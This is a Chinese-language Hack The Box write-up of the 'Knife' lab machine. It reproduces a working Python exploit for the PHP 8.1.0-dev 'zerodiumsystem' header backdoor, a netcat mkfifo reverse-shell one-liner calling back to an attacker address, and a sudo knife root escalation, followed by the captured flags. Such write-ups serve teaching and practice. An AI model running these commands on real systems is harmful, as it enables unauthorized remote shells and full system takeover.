Knife-htb-writeup

0x00 靶场技能介绍

章节技能：php8.1.0-dev后门漏洞、knife错配提权

参考链接：官方引导模式

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.242

2、扫描下开放端口信息

sudo nmap -sT -sV -sC -O -p"22,80," "10.10.10.242"

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)

3、并没有发现什么特别的东西，那就打开80端口看下网站信息吧

4、通过各种目录扫描，网站关键词谷歌，毫无任何有用的发现，最后查看了下官方引导，妈的，原来是PHP版本的问题！！！

5、查看 Wappalyzer 提示，发现网站是使用了 PHP8.1.0 ，通过使用网站开发者工具发现具体版本为 8.1.0-dev

6、使用谷歌进行搜索相关exp

8.1.0-dev exploit

7、发现了该版本的一个后门漏洞

https://www.exploit-db.com/exploits/49933

#!/usr/bin/env python3
import os
import re
import requests

host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)

if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
        while 1:
            cmd = input("$ ")
            headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers = headers, allow_redirects = False)
            current_page = response.text
            stdout = current_page.split('<!DOCTYPE html>',1)
            text = print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        exit

else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit

8、接下来就是使用exp直接开打，验证下是否存在该漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ python3 exp.py 
Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/ 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

9、好，那接下来就是获取最终的user.txt的信息了

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.9 443 >/tmp/f

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.242] 45346
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ 

james@knife:/$ cd /home/james
cd /home/james
james@knife:~$ ls -la
ls -la
total 40
drwxr-xr-x 5 james james 4096 May 18  2021 .
drwxr-xr-x 3 root  root  4096 May  6  2021 ..
lrwxrwxrwx 1 james james    9 May 10  2021 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25  2020 .bashrc
drwx------ 2 james james 4096 May  6  2021 .cache
drwxrwxr-x 3 james james 4096 May  6  2021 .local
-rw-r--r-- 1 james james  807 Feb 25  2020 .profile
-rw-rw-r-- 1 james james   66 May  7  2021 .selected_editor
drwx------ 2 james james 4096 May 18  2021 .ssh
-r-------- 1 james james   33 Dec 11 07:44 user.txt
james@knife:~$ cat user.txt
cat user.txt
986f5de877ca6770c36978c8e9e5e51d
james@knife:~$

0x02 系统权限获取

10、通过sudo -l 发现了一个可利用提权

james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
james@knife:~$

11、这里参考gtfobins网站，继续一键提权，获取到flag文件

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
6ae2bb5aba8203591469695a4557dbb1
#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/347